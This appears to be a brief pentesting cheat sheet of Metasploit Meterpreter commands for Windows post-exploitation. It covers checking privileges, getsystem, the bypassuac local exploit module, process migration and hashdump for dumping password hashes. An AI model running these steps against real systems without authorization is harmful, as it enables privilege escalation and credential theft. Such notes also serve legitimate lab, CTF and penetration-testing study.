Windows

ps
getuid
getpid
getsystem
ps -U SYSTEM

CHECK UAC/Privileges
run post/windows/gather/win_privs

BYPASS UAC
Background the session first
exploit/windows/local/bypassuac
set session

After PrivEsc
migrate <pid>
hashdump

Last updated